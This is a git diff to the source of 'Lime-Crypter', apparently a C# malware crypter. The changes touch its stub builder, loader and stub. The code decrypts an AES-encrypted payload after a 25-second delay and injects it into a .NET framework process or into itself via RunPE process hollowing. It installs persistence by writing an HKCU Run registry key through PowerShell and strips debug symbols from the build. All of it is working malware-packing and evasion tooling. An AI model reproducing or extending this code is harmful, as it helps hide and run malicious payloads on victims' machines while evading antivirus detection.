diff --git a/Lime-Crypter/Build/SetupBuild.cs b/Lime-Crypter/Build/SetupBuild.cs index 9978e11..721e9d0 100644 --- a/Lime-Crypter/Build/SetupBuild.cs +++ b/Lime-Crypter/Build/SetupBuild.cs @@ -56,6 +56,9 @@ public string Compile() { "System.dll", "System.Windows.Forms.dll", + "Microsoft.CSharp.dll", + "System.Dynamic.Runtime.dll", + "System.Core.dll", }; Dictionary providerOptions = new Dictionary() { {"CompilerVersion", "v4.0" } @@ -176,13 +179,18 @@ public void PrepareSource() Stub = Stub.Replace("#ParentResource", StubResourcesName); Stub = Stub.Replace("#Payload", PayloadResources); - Stub = Stub.Replace("#Injection", InjectionName + ".exe"); + if (InjectionName == "Itself") + { + InjectionName = "Application.ExecutablePath"; + Stub = Stub.Replace("#Injection", InjectionName); + } + else + Stub = Stub.Replace("#Injection", "\"" + InjectionName + ".exe" + "\""); Stub = Stub.Replace("#AesKey", AesKey); if (IsInstall) - Stub = Stub.Replace("@IsInstall", "true"); - else - Stub = Stub.Replace("@IsInstall", "false"); + Stub = Stub.Replace("//#define install", "#define install"); + Stub = Stub.Replace("#FileName", FileName + ".exe"); Stub = Stub.Replace("@FolderName", @"" + FolderName + @""); Stub = Stub.Replace("#SecondFolder", SecondFolder); diff --git a/Lime-Crypter/Lime-Crypter.csproj b/Lime-Crypter/Lime-Crypter.csproj index bef3b0c..fa67846 100644 --- a/Lime-Crypter/Lime-Crypter.csproj +++ b/Lime-Crypter/Lime-Crypter.csproj @@ -25,7 +25,7 @@ AnyCPU - pdbonly + none true bin\Release\ TRACE diff --git a/Lime-Crypter/Resources/Loader.cs b/Lime-Crypter/Resources/Loader.cs index 2647eb9..49d9002 100644 --- a/Lime-Crypter/Resources/Loader.cs +++ b/Lime-Crypter/Resources/Loader.cs @@ -6,6 +6,7 @@ using System.Resources; using System.Runtime.InteropServices; using System.Windows.Forms; +using System.Threading; [assembly: AssemblyTitle("#AssemblyProduct")] [assembly: AssemblyDescription("#AssemblyDescription")] @@ -40,10 +41,11 @@ public Nyan() public void Initialize() { + Thread.Sleep(25 * 1000); Assembly myAssembly = AppDomain.CurrentDomain.Load(AES_Decrypt(GetResource("#Stub"))); Type myType = myAssembly.GetType("Stub.Program"); - object myObj = Activator.CreateInstance(myType); - myType.InvokeMember("Run", BindingFlags.InvokeMethod, null, myObj, null); + dynamic myObj = Activator.CreateInstance(myType); + myObj.Run(); } private static byte[] AES_Decrypt(byte[] bytesToBeDecrypted) diff --git a/Lime-Crypter/Resources/Stub.cs b/Lime-Crypter/Resources/Stub.cs index 6ff2ef9..a17e719 100644 --- a/Lime-Crypter/Resources/Stub.cs +++ b/Lime-Crypter/Resources/Stub.cs @@ -1,4 +1,6 @@ -using System; +//#define install + +using System; using System.ComponentModel; using System.Diagnostics; using System.Runtime.InteropServices; @@ -12,29 +14,28 @@ using System.Text; using System.Threading; using System.Windows.Forms; - + namespace Stub { public class Program { - public static void Run() + public void Run() { - new Installer() - { - EnableInstall = @IsInstall, - FileName = new FileInfo("#FileName"), - DirectoryName = new DirectoryInfo(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.@FolderName), "#SecondFolder")), - RegistryName = "#RegistryName", - }.Run(); +#if install + Installer installer = new Installer(); + installer.Run(); +#endif + RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), #Injection), AES_Decrypt(GetResource("#Payload")), false); + Environment.Exit(0); } - public static byte[] GetResource(string file) + public byte[] GetResource(string file) { ResourceManager ResManager = new ResourceManager("#ParentResource", Assembly.GetExecutingAssembly()); return (byte[])ResManager.GetObject(file); } - public static byte[] AES_Decrypt(byte[] bytesToBeDecrypted) + public byte[] AES_Decrypt(byte[] bytesToBeDecrypted) { byte[] decryptedBytes = null; byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 }; @@ -61,6 +62,7 @@ public static byte[] AES_Decrypt(byte[] bytesToBeDecrypted) } } +#if install #region Installation public class Installer { @@ -74,9 +76,9 @@ public class Installer */ public bool EnableInstall { get; set; } - public FileInfo FileName { get; set; } - public DirectoryInfo DirectoryName { get; set; } - public string RegistryName { get; set; } + public FileInfo FileName = new FileInfo("#FileName"); + public DirectoryInfo DirectoryName = new DirectoryInfo(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.@FolderName), "#SecondFolder")); + public string RegistryName = "#RegistryName"; public int Sleeping { get; set; } /// @@ -84,7 +86,7 @@ public class Installer /// public void Run() { - if (EnableInstall && !IsInstalled()) + if (!IsInstalled()) { try { @@ -94,8 +96,6 @@ public void Run() } catch { } } - RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), "#Injection"), Program.AES_Decrypt(Program.GetResource("#Payload")), false); - Environment.Exit(0); } /// @@ -151,7 +151,7 @@ public void InstallFile() public void InstallRegistry() { Powershell("Remove-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '" + RegistryName + "';" + - "New-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '" + RegistryName + "' -Value '" + Path.Combine(DirectoryName.FullName, FileName.Name) + "' -PropertyType 'String'"); + "New-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '" + RegistryName + "' -Value '" + "\"" + Path.Combine(DirectoryName.FullName, FileName.Name) + "\"" + "' -PropertyType 'String'"); } public void Powershell(string args) @@ -169,6 +169,7 @@ public void Powershell(string args) } #endregion +#endif #region RunPE Class public static class RunPE